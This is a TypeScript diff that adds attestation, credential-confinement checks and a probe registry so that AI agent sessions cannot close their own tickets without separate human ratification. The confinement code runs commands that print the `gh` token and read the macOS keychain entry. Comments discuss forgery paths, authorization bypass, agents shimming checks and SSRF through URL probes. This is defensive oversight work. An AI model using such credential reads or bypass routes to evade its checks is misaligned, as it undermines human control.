+ * On conjunct 2, read §3.2's honest limits before trusting it: it runs inside
+ * the environment it judges, so §1 clause 5 does not hold for it. It catches the
+ * honest-but-unisolated deployment automatically — today's case, and every
+ * adopter's until they isolate — and buys nothing against a session that sets
+ * out to shim it. Necessary, never sufficient: it may lower `attestation`, and
+ * it may not, on its own, raise it.
+ */
+
+import type {
+  AttestationCapability,
+  AttestationFacts,
+  AttestationState,
+  ConfinementProbeRecord,
+  NodeRef,
+  NodeState,
+} from "./work-graph";
+import type { CommandOutcome, CommandRequest } from "./work-graph-probes";
+
+/** Credential-bearing environment variables the confinement check must strip before probing. */
+const TOKEN_ENV_KEYS = ["GH_TOKEN", "GITHUB_TOKEN", "GH_ENTERPRISE_TOKEN", "GITHUB_ENTERPRISE_TOKEN"] as const;
+
+/** Depth cap on the root walk — a graph deeper than this is malformed, not deep. */
+const MAX_ROOT_WALK = 64;
+
+export interface ConfinementResult {
+  checked: boolean;
+  /** Every GitHub identity the session could reach with the token env stripped. */
+  reachableIdentities: string[];
+  at: string;
+  probes: ConfinementProbeRecord[];
+}
+
+export interface ConfinementDeps {
+  runCommand: (request: CommandRequest) => Promise<CommandOutcome>;
+  env: Readonly<Record<string, string | undefined>>;
+  platform: string;
+  now: () => Date;
+}
+
+/** Strip the token env: conjunct 2 asks what the session can *reach*, not which identity `gh` prefers. */
+function envWithoutTokens(env: Readonly<Record<string, string | undefined>>): Record<string, string> {
+  const stripped: Record<string, string> = {};
+  for (const [key, value] of Object.entries(env)) {
+    if (value === undefined) continue;
+    if ((TOKEN_ENV_KEYS as readonly string[]).includes(key)) continue;
+    stripped[key] = value;
+  }
+  return stripped;
+}
+
+/**
+ * Logins `gh auth status` reports. Both output shapes are matched — `account
+ * <login>` (current) and `as <login>` (older) — because a parser that silently
+ * matches neither reports an empty reachable set, which reads as *isolated* and
+ * would raise attestation on a parse failure.
+ */
+export function parseAuthStatusLogins(output: string): string[] {
+  const logins = new Set<string>();
+  for (const match of output.matchAll(/(?:account|as)\s+([A-Za-z0-9][A-Za-z0-9-]*)/gu)) {
+    logins.add(match[1]);
+  }
+  return [...logins].sort();
+}
+
+/**
+ * Run the confinement probe set with the token env stripped: `gh auth status`,
+ * `gh auth token`, and (on darwin) a direct read of the `gh` keychain item —
+ * the three ways #496's own probe script reached the principal's credential.
+ */
+export async function checkConfinement(deps: ConfinementDeps): Promise<ConfinementResult> {
+  const env = envWithoutTokens(deps.env);
+  const at = deps.now().toISOString();
+  const probes: ConfinementProbeRecord[] = [];
+  const reachable = new Set<string>();
+
+  const status = await deps.runCommand({ argv: ["gh", "auth", "status"], timeoutSec: 30, env });
+  const statusOutput = `${status.stdout}\n${status.stderr}`;
+  const logins = parseAuthStatusLogins(statusOutput);
+  for (const login of logins) reachable.add(login);
+  probes.push({
+    name: "gh auth status (token env stripped)",
+    observed: `exit ${status.exitCode}; identities: ${logins.length > 0 ? logins.join(", ") : "none"}`,
+  });
+
+  const token = await deps.runCommand({ argv: ["gh", "auth", "token"], timeoutSec: 30, env });
+  const tokenReachable = token.exitCode === 0 && token.stdout.trim().length > 0;
+  if (tokenReachable && logins.length === 0) {
+    // A credential is reachable but unnamed — it still counts, and it must not
+    // be swallowed just because the status parse came back empty.
+    reachable.add("unidentified-credential");
+  }
+  probes.push({
+    name: "gh auth token (token env stripped)",
+    observed: tokenReachable ? "printed a credential" : `refused (exit ${token.exitCode})`,
+  });
+
+  if (deps.platform === "darwin") {
+    const keychain = await deps.runCommand({
+      argv: ["security", "find-generic-password", "-s", "gh:github.com"],
+      timeoutSec: 30,
+      env,
+    });
+    const keychainReachable = keychain.exitCode === 0;
+    if (keychainReachable) reachable.add("keychain:gh:github.com");
+    probes.push({
+      name: "security find-generic-password -s gh:github.com",
+      observed: keychainReachable ? "keychain item readable" : `refused (exit ${keychain.exitCode})`,
+    });
+  }
+
+  return { checked: true, reachableIdentities: [...reachable].sort(), at, probes };
+}
+
+export interface AttestationInputs {
+  /** Conjunct 1 — {@link GraphStore.attestation}, the backend's capability. */
+  backendCapability: AttestationCapability;
+  /** The identity this session acts as; both the confinement baseline and the disqualifier for conjunct 4. */
+  actingIdentity: string;
+  confinement?: ConfinementResult;
+  proposal?: { commentId: string; author: string };
+  ratification?: { kind: "reaction" | "comment"; id: string; author: string };
+  root?: { nodeId: string; author: string };
+}
+
+export interface AttestationOutcome {
+  attestation: AttestationState;
+  facts: AttestationFacts;
+}
+
+/**
+ * The four conjuncts of §3.2, evaluated together so the receipt can record every
+ * failure rather than the first one — a reader fixing a wrong ratifier needs to
+ * know the keyring is also reachable.
+ */
+export function deriveAttestation(inputs: AttestationInputs): AttestationOutcome {
+  const reasons: string[] = [];
+
+  if (inputs.backendCapability !== "verifiable") {
+    reasons.push(`backend cannot attest (capability: ${inputs.backendCapability})`);
+  }
+
+  const confinement = inputs.confinement;
+  if (confinement?.checked !== true) {
+    reasons.push("confinement was not checked — a session whose credential topology is unknown is not isolated");
+  } else {
+    const foreign = confinement.reachableIdentities.filter((identity) => identity !== inputs.actingIdentity);
+    if (foreign.length > 0) {
+      reasons.push(`credentials other than ${inputs.actingIdentity} are reachable from this session: ${foreign.join(", ")}`);
+    }
+  }
+
+  const { proposal, ratification, root } = inputs;
+  const proposer = proposal?.author;
+  const ratifier = ratification?.author;
+
+  if (ratifier === undefined) {
+    reasons.push("no ratification found — nothing was attested by a second credential");
+  }
+  if (proposer === undefined) {
+    reasons.push("no proposal comment recorded — there is nothing for a ratification to bind to");
+  }
+  if (proposer !== undefined && proposer === ratifier) {
+    reasons.push(`proposal and ratification share an author (${proposer}) — one credential, not two`);
+  }
+
+  if (root === undefined) {
+    reasons.push("graph root unreachable — cannot tell who is authorized to ratify");
+  } else {
+    if (root.author === inputs.actingIdentity) {
+      reasons.push(`graph root ${root.nodeId} is authored by the acting identity (${inputs.actingIdentity})`);
+    }
+    if (ratifier !== undefined && ratifier !== root.author) {
+      reasons.push(`ratifier ${ratifier} is not the author of graph root ${root.nodeId} (${root.author})`);
+    }
+  }
+
+  const facts: AttestationFacts = {
+    backendCapability: inputs.backendCapability,
+    ...(confinement === undefined
+      ? {}
+      : {
+          confinement: {
+            checked: confinement.checked,
+            reachableIdentities: confinement.reachableIdentities,
+            at: confinement.at,
+            probes: confinement.probes,
+          },
+        }),
+    ...(proposal === undefined ? {} : { proposal }),
+    ...(ratification === undefined ? {} : { ratification }),
+    ...(root === undefined ? {} : { root }),
+    ...(reasons.length === 0 ? {} : { reasons }),
+  };
+
+  return { attestation: reasons.length === 0 ? "verified" : "unverified", facts };
+}
+
+/**
+ * Conjunct 4's authorized ratifier: walk native parent edges up from the closing
+ * node and read the root's author from the API author field. Deliberately not a
+ * configured binding — a configured one is agent-writable, and once the gate
+ * keys on *which* human, a rewritable binding is a forgery path.
+ *
+ * Returns undefined when the walk cannot complete (a broken parent edge, a cycle,
+ * or a graph deeper than {@link MAX_ROOT_WALK}); the caller reads that as
+ * "root unreachable" and downgrades, never as a pass.
+ */
+export async function findGraphRoot(
+  start: NodeRef,
+  readNode: (ref: NodeRef) => Promise<NodeState>,
+): Promise<{ nodeId: string; author: string } | undefined> {
+  const seen = new Set<string>();
+  let current: NodeRef = start;
+
+  for (let depth = 0; depth < MAX_ROOT_WALK; depth += 1) {
+    if (seen.has(current.id)) return undefined;
+    seen.add(current.id);
+
+    let state: NodeState;
+    try {
+      state = await readNode(current);
+    } catch {
+      return undefined;
+    }
+
+    if (state.parent === undefined) {
+      return state.author.length === 0 ? undefined : { nodeId: state.ref.id, author: state.author };
+    }
+    current = state.parent;
+  }
+
+  return undefined;
+}

--- a/src/work-graph-github.ts
+++ b/src/work-graph-github.ts
@@ -1,0 +1,407 @@
+/**
+ * GitHub backend for the work graph (`docs/work-graph.md` §2.5, #497).
+ *
+ * Day-one store: tracker issues *are* the graph surface (§5). Topology rides on
+ * GitHub's native relationships — sub-issues for membership, issue dependencies
+ * for blocking — so the frontier renders in the tracker's own UI and a human can
+ * read the graph without soma installed.
+ *
+ * The typed part of a node (autonomy, probes, checkpoint, budget) rides in an
+ * HTML-comment block in the issue body: invisible when rendered, readable in
+ * raw markdown, and the tracker never becomes a typed database (§5). An issue
+ * with no block is a hand-authored ticket — reported fail-safe as `approve`
+ * with no probes, never `auto`.
+ *
+ * I/O only. Every rule (validation, cycle rejection, frontier confirmation,
+ * close gating) lives in {@link WorkGraph}.
+ */
+
+import {
+  WorkGraphError,
+  parseNodeSpec,
+  renderCloseReceipt,
+  resolveClaimRace,
+  toNode,
+  type AttestationCapability,
+  type ClaimResult,
+  type CloseReceipt,
+  type CommentRef,
+  type CreateNodeSpec,
+  type GraphStore,
+  type NodeRef,
+  type NodeState,
+  type NodeStatus,
+  type Reaction,
+  type WorkGraphNode,
+} from "./work-graph";
+
+const NODE_BLOCK_OPEN = "<!-- soma:work-graph-node";
+const NODE_BLOCK_CLOSE = "-->";
+
+export interface GitHubApiRequest {
+  method: "GET" | "POST" | "PATCH" | "DELETE";
+  /** API path without a leading slash, e.g. `repos/owner/name/issues/1`. */
+  path: string;
+  body?: Record<string, unknown>;
+  paginate?: boolean;
+}
+
+/** The one seam the backend needs — makes the store testable without a network or a tracker. */
+export type GitHubApiTransport = (request: GitHubApiRequest) => Promise<unknown>;
+
+export interface GhCliTransportOptions {
+  binary?: string;
+  cwd?: string;
+}
+
+/**
+ * Default transport: shell out to `gh api`.
+ *
+ * `gh` owns credential resolution, which is the point — the identity a session
+ * acts as is a deployment fact (§5), not something soma re-implements. Sessions
+ * run with `GH_TOKEN` set to the agent PAT; what else a session can *reach* is
+ * the confinement question (#511), decided outside this module.
+ */
+export function createGhCliTransport(options: GhCliTransportOptions = {}): GitHubApiTransport {
+  const binary = options.binary ?? "gh";
+  return async (request: GitHubApiRequest): Promise<unknown> => {
+    const args = ["api", "--method", request.method, request.path];
+    if (request.paginate === true) args.push("--paginate");
+    if (request.body !== undefined) args.push("--input", "-");
+
+    const proc = Bun.spawn([binary, ...args], {
+      stdin: request.body === undefined ? "ignore" : new TextEncoder().encode(JSON.stringify(request.body)),
+      stdout: "pipe",
+      stderr: "pipe",
+      ...(options.cwd === undefined ? {} : { cwd: options.cwd }),
+    });
+    const [stdout, stderr, exitCode] = await Promise.all([
+      new Response(proc.stdout).text(),
+      new Response(proc.stderr).text(),
+      proc.exited,
+    ]);
+    if (exitCode !== 0) {
+      throw new WorkGraphError(
+        "backend",
+        `gh api ${request.method} ${request.path} failed (exit ${exitCode}): ${stderr.trim()}`,
+      );
+    }
+    const trimmed = stdout.trim();
+    if (trimmed.length === 0) return null;
+    try {
+      return JSON.parse(trimmed) as unknown;
+    } catch {
+      throw new WorkGraphError("backend", `gh api ${request.method} ${request.path} returned unparseable JSON`);
+    }
+  };
+}
+
+export interface GitHubGraphStoreOptions {
+  /** `owner/name`. A graph records its backend at creation and lives there forever (§2.5). */
+  repo: string;
+  transport?: GitHubApiTransport;
+}
+
+interface GitHubIssue {
+  number: number;
+  /** Database id — what the sub-issue and dependency endpoints take, never the issue number. */
+  id: number;
+  title: string;
+  body: string;
+  status: NodeStatus;
+  author: string;
+  assignees: string[];
+  url?: string;
+  parentNumber?: number;
+}
+
+interface GitHubComment {
+  id: number;
+  author: string;
+  url?: string;
+}
+
+function asRecord(value: unknown, context: string): Record<string, unknown> {
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    throw new WorkGraphError("backend", `${context}: expected an object from the GitHub API`);
+  }
+  return value as Record<string, unknown>;
+}
+
+function asArray(value: unknown, context: string): unknown[] {
+  if (!Array.isArray(value)) {
+    throw new WorkGraphError("backend", `${context}: expected an array from the GitHub API`);
+  }
+  return value;
+}
+
+function readNumber(record: Record<string, unknown>, key: string, context: string): number {
+  const value = record[key];
+  if (typeof value !== "number") {
+    throw new WorkGraphError("backend", `${context}: "${key}" missing from the GitHub response`);
+  }
+  return value;
+}
+
+function readLogin(value: unknown): string {
+  if (typeof value !== "object" || value === null) return "";
+  const login = (value as Record<string, unknown>).login;
+  return typeof login === "string" ? login : "";
+}
+
+function readIssue(value: unknown, context: string): GitHubIssue {
+  const record = asRecord(value, context);
+  const assignees = Array.isArray(record.assignees)
+    ? record.assignees.map((entry) => readLogin(entry)).filter((login) => login.length > 0)
+    : [];
+  const parent = record.parent;
+  const parentNumber =
+    typeof parent === "object" && parent !== null && typeof (parent as Record<string, unknown>).number === "number"
+      ? ((parent as Record<string, unknown>).number as number)
+      : undefined;
+  return {
+    number: readNumber(record, "number", context),
+    id: readNumber(record, "id", context),
+    title: typeof record.title === "string" ? record.title : "",
+    body: typeof record.body === "string" ? record.body : "",
+    status: record.state === "closed" ? "closed" : "open",
+    author: readLogin(record.user),
+    assignees,
+    ...(typeof record.html_url === "string" ? { url: record.html_url } : {}),
+    ...(parentNumber === undefined ? {} : { parentNumber }),
+  };
+}
+
+function readComment(value: unknown, context: string): GitHubComment {
+  const record = asRecord(value, context);
+  return {
+    id: readNumber(record, "id", context),
+    author: readLogin(record.user),
+    ...(typeof record.html_url === "string" ? { url: record.html_url } : {}),
+  };
+}
+
+/** The typed half of a node, as stored in the issue body. Title lives in the issue title; parent is a native edge. */
+export function encodeNodeBlock(spec: CreateNodeSpec): string {
+  const payload: Record<string, unknown> = { autonomy: spec.autonomy };
+  if (spec.kind !== undefined) payload.kind = spec.kind;
+  if (spec.checkpointId !== undefined) payload.checkpointId = spec.checkpointId;
+  if (spec.budget !== undefined) payload.budget = spec.budget;
+  if (spec.probes !== undefined && spec.probes.length > 0) payload.probes = spec.probes;
+  return `${NODE_BLOCK_OPEN}\n${JSON.stringify(payload, null, 2)}\n${NODE_BLOCK_CLOSE}`;
+}
+
+export interface DecodedBody {
+  /** Issue body with the node block removed — the human-readable question. */
+  text: string;
+  /** Raw JSON found in the block, still untrusted; undefined when the issue carries no block. */
+  raw?: string;
+}
+
+export function decodeNodeBlock(body: string): DecodedBody {
+  const open = body.lastIndexOf(NODE_BLOCK_OPEN);
+  if (open === -1) return { text: body.trim() };
+  const close = body.indexOf(NODE_BLOCK_CLOSE, open + NODE_BLOCK_OPEN.length);
+  if (close === -1) return { text: body.trim() };
+  return {
+    text: `${body.slice(0, open)}${body.slice(close + NODE_BLOCK_CLOSE.length)}`.trim(),
+    raw: body.slice(open + NODE_BLOCK_OPEN.length, close).trim(),
+  };
+}
+
+/**
+ * An issue with no readable node block still has to answer `readNode` — the
+ * dogfooding walk runs over hand-authored tickets. It reports as the most-gated
+ * class with no probes: nothing declared how to check it by machine, so nothing
+ * may close it by machine.
+ */
+function untypedNode(issue: GitHubIssue): WorkGraphNode {
+  return { id: String(issue.number), title: issue.title, autonomy: "approve" };
+}
+
+function nodeFromIssue(issue: GitHubIssue): { node: WorkGraphNode; typed: boolean; parseError?: string; text: string } {
+  const decoded = decodeNodeBlock(issue.body);
+  if (decoded.raw === undefined) {
+    return { node: untypedNode(issue), typed: false, text: decoded.text };
+  }
+  try {
+    const block = asRecord(JSON.parse(decoded.raw) as unknown, "node block");
+    const spec = parseNodeSpec({ ...block, title: issue.title });
+    return { node: toNode(String(issue.number), spec), typed: true, text: decoded.text };
+  } catch (error) {
+    // Visible state, never a silent downgrade: the node falls back to the
+    // most-gated class AND says why.
+    return {
+      node: untypedNode(issue),
+      typed: false,
+      parseError: error instanceof Error ? error.message : String(error),
+      text: decoded.text,
+    };
+  }
+}
+
+class GitHubGraphStore implements GraphStore {
+  /** GitHub can attest comment and reaction authorship via its API (§2.5). Capability, not verdict. */
+  readonly attestation: AttestationCapability = "verifiable";
+
+  private readonly repo: string;
+  private readonly transport: GitHubApiTransport;
+
+  constructor(options: GitHubGraphStoreOptions) {
+    if (!/^[^/\s]+\/[^/\s]+$/.test(options.repo)) {
+      throw new WorkGraphError("backend", `repo must be "owner/name", got ${JSON.stringify(options.repo)}`);
+    }
+    this.repo = options.repo;
+    this.transport = options.transport ?? createGhCliTransport();
+  }
+
+  async createNode(spec: CreateNodeSpec): Promise<NodeRef> {
+    const body = [spec.body ?? "", encodeNodeBlock(spec)].filter((part) => part.length > 0).join("\n\n");
+    const created = readIssue(
+      await this.transport({ method: "POST", path: `repos/${this.repo}/issues`, body: { title: spec.title, body } }),
+      "createNode",
+    );
+    if (spec.parent !== undefined) {
+      await this.transport({
+        method: "POST",
+        path: `repos/${this.repo}/issues/${spec.parent.id}/sub_issues`,
+        body: { sub_issue_id: created.id },
+      });
+    }
+    return { id: String(created.number) };
+  }
+
+  async addBlockingEdge(blocker: NodeRef, blocked: NodeRef): Promise<void> {
+    const blockerIssue = await this.fetchIssue(blocker);
+    await this.transport({
+      method: "POST",
+      path: `repos/${this.repo}/issues/${blocked.id}/dependencies/blocked_by`,
+      // The dependency endpoint keys on the database id, not the issue number.
+      body: { issue_id: blockerIssue.id },
+    });
+  }
+
+  async readNode(ref: NodeRef): Promise<NodeState> {
+    const issue = await this.fetchIssue(ref);
+    const blockers = asArray(
+      await this.transport({
+        method: "GET",
+        path: `repos/${this.repo}/issues/${ref.id}/dependencies/blocked_by`,
+        paginate: true,
+      }),
+      "readNode blocked_by",
+    ).map((entry) => readIssue(entry, "readNode blocked_by"));
+    const { node, typed, parseError, text } = nodeFromIssue(issue);
+    return {
+      ref: { id: String(issue.number) },
+      node,
+      status: issue.status,
+      assignees: issue.assignees,
+      blockedBy: blockers.map((blocker) => ({ id: String(blocker.number), status: blocker.status })),
+      author: issue.author,
+      ...(issue.parentNumber === undefined ? {} : { parent: { id: String(issue.parentNumber) } }),
+      ...(text.length === 0 ? {} : { body: text }),
+      ...(issue.url === undefined ? {} : { url: issue.url }),
+      typed,
+      ...(parseError === undefined ? {} : { parseError }),
+    };
+  }
+
+  /**
+   * Membership comes from native sub-issue edges — the same relationship the
+   * tracker UI renders. Closed children are dropped here as a cheap pre-filter;
+   * the contract layer re-confirms every survivor by direct fetch.
+   */
+  async listCandidateFrontier(root: NodeRef): Promise<NodeRef[]> {
+    const children = asArray(
+      await this.transport({ method: "GET", path: `repos/${this.repo}/issues/${root.id}/sub_issues`, paginate: true }),
+      "listCandidateFrontier",
+    ).map((entry) => readIssue(entry, "listCandidateFrontier"));
+    return children.filter((child) => child.status === "open").map((child) => ({ id: String(child.number) }));
+  }
+
+  /**
+   * GitHub offers no compare-and-swap, so: assign, re-read, and let the
+   * deterministic tie-break decide. A loser removes itself, so the assignee set
+   * converges to the single holder without coordination (§2.4).
+   */
+  async claim(ref: NodeRef, identity: string): Promise<ClaimResult> {
+    const before = await this.fetchIssue(ref);
+    if (before.status === "closed") {
+      throw new WorkGraphError("node-closed", `node ${ref.id} is closed — nothing to claim`);
+    }
+    await this.transport({
+      method: "POST",
+      path: `repos/${this.repo}/issues/${ref.id}/assignees`,
+      body: { assignees: [identity] },
+    });
+
+    const after = await this.fetchIssue(ref);
+    const { held, holder } = resolveClaimRace(identity, after.assignees);
+    if (!held && after.assignees.includes(identity)) {
+      await this.transport({
+        method: "DELETE",
+        path: `repos/${this.repo}/issues/${ref.id}/assignees`,
+        body: { assignees: [identity] },
+      });
+      return { held, identity, holder, assignees: after.assignees.filter((login) => login !== identity) };
+    }
+    return { held, identity, holder, assignees: after.assignees };
+  }
+
+  async postComment(ref: NodeRef, body: string): Promise<CommentRef> {
+    const comment = readComment(
+      await this.transport({ method: "POST", path: `repos/${this.repo}/issues/${ref.id}/comments`, body: { body } }),
+      "postComment",
+    );
+    return {
+      id: String(comment.id),
+      nodeId: ref.id,
+      author: comment.author,
+      ...(comment.url === undefined ? {} : { url: comment.url }),
+    };
+  }
+
+  /** Authors come from the API author field — the whole point of reading reactions here (§3.2 conjunct 3). */
+  async readCommentReactions(ref: CommentRef): Promise<Reaction[]> {
+    const reactions = asArray(
+      await this.transport({
+        method: "GET",
+        path: `repos/${this.repo}/issues/comments/${ref.id}/reactions`,
+        paginate: true,
+      }),
+      "readCommentReactions",
+    );
+    return reactions.map((entry) => {
+      const record = asRecord(entry, "readCommentReactions");
+      const createdAt = record.created_at;
+      return {
+        id: String(readNumber(record, "id", "readCommentReactions")),
+        content: typeof record.content === "string" ? record.content : "",
+        author: readLogin(record.user),
+        ...(typeof createdAt === "string" ? { createdAt } : {}),
+      };
+    });
+  }
+
+  /** Receipt first, then the state change: a close that fails halfway leaves the evidence, not a bare closed issue. */
+  async close(ref: NodeRef, receipt: CloseReceipt): Promise<void> {
+    await this.postComment(ref, renderCloseReceipt(receipt));
+    await this.transport({
+      method: "PATCH",
+      path: `repos/${this.repo}/issues/${ref.id}`,
+      body: { state: "closed", state_reason: "completed" },
+    });
+  }
+
+  private async fetchIssue(ref: NodeRef): Promise<GitHubIssue> {
+    return readIssue(
+      await this.transport({ method: "GET", path: `repos/${this.repo}/issues/${ref.id}` }),
+      `issue ${ref.id}`,
+    );
+  }
+}
+
+export function createGitHubGraphStore(options: GitHubGraphStoreOptions): GraphStore {
+  return new GitHubGraphStore(options);
+}

--- a/src/work-graph-github.ts
+++ b/src/work-graph-github.ts
@@ -283,6 +283,7 @@ class GitHubGraphStore implements GraphStore {
 
   async readNode(ref: NodeRef): Promise<NodeState> {
     const issue = await this.fetchIssue(ref);
+    const parentNumber = issue.parentNumber ?? (await this.fetchParentNumber(issue.number));
     const blockers = asArray(
       await this.transport({
         method: "GET",
@@ -299,7 +300,7 @@ class GitHubGraphStore implements GraphStore {
       assignees: issue.assignees,
       blockedBy: blockers.map((blocker) => ({ id: String(blocker.number), status: blocker.status })),
       author: issue.author,
-      ...(issue.parentNumber === undefined ? {} : { parent: { id: String(issue.parentNumber) } }),
+      ...(parentNumber === undefined ? {} : { parent: { id: String(parentNumber) } }),
       ...(text.length === 0 ? {} : { body: text }),
       ...(issue.url === undefined ? {} : { url: issue.url }),
       typed,
@@ -362,6 +363,20 @@ class GitHubGraphStore implements GraphStore {
     };
   }
 
+  /** Re-read a comment for its API author field — the proposal half of §3.2 conjunct 3. */
+  async readComment(ref: CommentRef): Promise<CommentRef> {
+    const comment = readComment(
+      await this.transport({ method: "GET", path: `repos/${this.repo}/issues/comments/${ref.id}` }),
+      "readComment",
+    );
+    return {
+      id: String(comment.id),
+      nodeId: ref.nodeId,
+      author: comment.author,
+      ...(comment.url === undefined ? {} : { url: comment.url }),
+    };
+  }
+
   /** Authors come from the API author field — the whole point of reading reactions here (§3.2 conjunct 3). */
   async readCommentReactions(ref: CommentRef): Promise<Reaction[]> {
     const reactions = asArray(
@@ -392,6 +407,39 @@ class GitHubGraphStore implements GraphStore {
       path: `repos/${this.repo}/issues/${ref.id}`,
       body: { state: "closed", state_reason: "completed" },
     });
+  }
+
+  /**
+   * The sub-issue *parent* edge, which the REST issue payload does not carry —
+   * `GET repos/{repo}/issues/{n}` has no `parent` key at all, while the child
+   * direction (`/sub_issues`) does. Only GraphQL exposes it.
+   *
+   * This matters well beyond display: §3.2 conjunct 4 derives the authorized
+   * ratifier by walking parent edges to the graph root. With no parent, every
+   * node resolves to itself as root, and "the root's author may ratify" quietly
+   * degrades into "a ticket's own author may ratify its close" — an
+   * authorization bypass, not a cosmetic gap.
+   *
+   * A missing or unreadable parent returns undefined, which the caller reads as
+   * "root unreachable" and downgrades on. Never an assumed root.
+   */
+  private async fetchParentNumber(issueNumber: number): Promise<number | undefined> {
+    const [owner, name] = this.repo.split("/");
+    const response = await this.transport({
+      method: "POST",
+      path: "graphql",
+      body: {
+        query:
+          "query($owner:String!,$name:String!,$number:Int!){repository(owner:$owner,name:$name){issue(number:$number){parent{number}}}}",
+        variables: { owner, name, number: issueNumber },
+      },
+    });
+
+    const data = (response as { data?: { repository?: { issue?: { parent?: { number?: unknown } | null } | null } | null } } | null)
+      ?.data;
+    const parent = data?.repository?.issue?.parent;
+    const number = parent?.number;
+    return typeof number === "number" ? number : undefined;
   }
 
   private async fetchIssue(ref: NodeRef): Promise<GitHubIssue> {

--- a/src/work-graph-probe-registry.ts
+++ b/src/work-graph-probe-registry.ts
@@ -1,0 +1,480 @@
+/**
+ * Probe registry — the gate DD-16 Amendment A puts in front of `command` and
+ * `url` probes (`docs/work-graph.md` §2.2 and §4, ticket #526).
+ *
+ * The question it answers is **whose code is this**. A `command` probe is a
+ * shell string living in the node block — *tracker content* — and
+ * `soma graph close` executes it on the closing machine. `soma graph` runs
+ * against whatever repo an adopter points it at, so soma cannot know that
+ * repo's visibility, collaborator set, or issue policy: no rule of the form
+ * "trust authors who are X" is available to it. What *is* available is a
+ * content-structural rule — tracker content may **parameterise** a probe but may
+ * never introduce executable code or a network destination:
+ *
+ * - **`command`** — refused unless the exact `run` string **and** the resolved
+ *   `cwd` are declared for this repo. `cwd` is part of the match, not
+ *   incidental: a declared `bun test` executed in an attacker-chosen directory
+ *   is a different command.
+ * - **`url`** — refused unless the target host is declared. Ungated, a `url`
+ *   probe is a blind SSRF oracle: the request issues from the closing machine
+ *   and the receipt publishes the observed status back to a possibly
+ *   world-readable tracker.
+ * - **`git-ref-exists` / `git-merged-into` / `artifact-exists`** — ungated. They
+ *   execute as argv with no shell, cause no egress, and are bounded to existence
+ *   checks in a local tree.
+ *
+ * The document lives in **soma-home, never the repo**: §1 clause 5 keeps
+ * enforcement off the tree it guards, and a committed registry is writable by
+ * any agent holding Write.
+ *
+ * The rule is **uniform**: nothing here reads a node's autonomy class, and the
+ * gate sits in the runner rather than in any one caller, so an interactive
+ * close, an `auto` close and the phase-2 headless tick are gated identically.
+ * The registry answers *whose code this is*; headlessness changes who is
+ * watching, not what is authorised.
+ *
+ * Everything here is **deny by default**. No document, an unparsable document, a
+ * document with no entry for this repo — all refuse, and refusal is a *failed
+ * probe* (`outcome: "fail"`), never an exception and never a skip, so the close
+ * refuses through the path {@link assertClosable} already owns. That is the
+ * spec's rule verbatim: a machine with no declaration refuses those closes.
+ *
+ * **Reading is not executing.** Nothing here is on the read path — `soma graph
+ * node` and `soma graph frontier` read any node regardless, because a node is
+ * data. Only the close path gates.
+ */
+
+import { homedir } from "node:os";
+import { isAbsolute, join, resolve } from "node:path";
+import type { Probe, ProbeResult } from "./work-graph";
+
+/** Where the registry sits inside soma-home. */
+export const PROBE_REGISTRY_RELATIVE_PATH = "policy/probe-registry.json";
+
+/**
+ * Every refusal `observed` string opens with this. It lets a caller tell a gate
+ * refusal from a command that genuinely ran and failed without adding a field to
+ * the `ProbeResult` wire shape §2.2 fixes.
+ */
+export const PROBE_REFUSED_PREFIX = "probe refused by the probe registry (DD-16 Amendment A):";
+
+/** Only version this binary understands. An unknown version refuses rather than guessing. */
+export const PROBE_REGISTRY_VERSION = 1;
+
+/** Tracker-supplied strings are echoed into refusal messages; bound what an author can inject there. */
+const ECHO_LIMIT = 200;
+
+/** One authorised command. Both halves must match a probe exactly for it to run. */
+export interface DeclaredCommand {
+  /** The `run` string a probe must carry, byte for byte. */
+  run: string;
+  /** Absolute directory the command is authorised to run in. */
+  cwd: string;
+}
+
+/**
+ * The registry as this machine has it for one repo. Deliberately a union rather
+ * than an optional bag: "no document", "unusable document" and "document with
+ * nothing for this repo" all refuse, but they have different fixes, and the
+ * refusal message has to say which one the adopter is looking at.
+ */
+export type ProbeRegistry =
+  | {
+      status: "loaded";
+      repo: string;
+      path: string;
+      commands: readonly DeclaredCommand[];
+      urlHosts: readonly string[];
+    }
+  | { status: "absent"; repo: string; path: string }
+  | { status: "invalid"; repo: string; path: string; reason: string };
+
+export type ProbeAuthorization = { allowed: true } | { allowed: false; reason: string };
+
+export interface ProbeRegistryHomeOptions {
+  homeDir?: string;
+  somaHome?: string;
+}
+
+export interface LoadProbeRegistryOptions extends ProbeRegistryHomeOptions {
+  repo: string;
+  /** Resolves to `undefined` when the document does not exist. Injected for tests. */
+  readFile?: (path: string) => Promise<string | undefined>;
+}
+
+export interface ParseProbeRegistryInput extends Pick<ProbeRegistryHomeOptions, "homeDir"> {
+  repo: string;
+  path: string;
+  raw: string;
+}
+
+// ---------------------------------------------------------------------------
+// Loading
+// ---------------------------------------------------------------------------
+
+export function probeRegistryPath(options: ProbeRegistryHomeOptions = {}): string {
+  const home = resolve(options.homeDir ?? homedir());
+  const somaHome = resolve(options.somaHome ?? join(home, ".soma"));
+  return join(somaHome, PROBE_REGISTRY_RELATIVE_PATH);
+}
+
+async function defaultReadFile(path: string): Promise<string | undefined> {
+  const file = Bun.file(path);
+  return (await file.exists()) ? await file.text() : undefined;
+}
+
+/**
+ * Read the registry for `repo`. Never throws: an unreadable document is an
+ * `invalid` registry, which refuses, rather than an exception that a caller
+ * might turn into a skipped probe.
+ */
+export async function loadProbeRegistry(options: LoadProbeRegistryOptions): Promise<ProbeRegistry> {
+  const path = probeRegistryPath(options);
+  const read = options.readFile ?? defaultReadFile;
+
+  let raw: string | undefined;
+  try {
+    raw = await read(path);
+  } catch (error) {
+    return { status: "invalid", repo: options.repo, path, reason: `could not be read: ${describe(error)}` };
+  }
+
+  if (raw === undefined) return { status: "absent", repo: options.repo, path };
+  return parseProbeRegistry({
+    repo: options.repo,
+    path,
+    raw,
+    ...(options.homeDir === undefined ? {} : { homeDir: options.homeDir }),
+  });
+}
+
+// ---------------------------------------------------------------------------
+// Parsing
+// ---------------------------------------------------------------------------
+
+/**
+ * Parse and validate the whole document, not just the entry for `repo`.
+ *
+ * Validating only the matching entry would let a typo elsewhere pass unnoticed;
+ * in an authorisation list a silently-ignored key is the bug that makes an
+ * adopter believe something is declared when it is not. Whole-document
+ * validation makes every mistake loud, and loud here still means closed.
+ */
+export function parseProbeRegistry(input: ParseProbeRegistryInput): ProbeRegistry {
+  const invalid = (reason: string): ProbeRegistry => ({
+    status: "invalid",
+    repo: input.repo,
+    path: input.path,
+    reason,
+  });
+
+  let document: unknown;
+  try {
+    document = JSON.parse(input.raw) as unknown;
+  } catch (error) {
+    return invalid(`is not valid JSON: ${describe(error)}`);
+  }
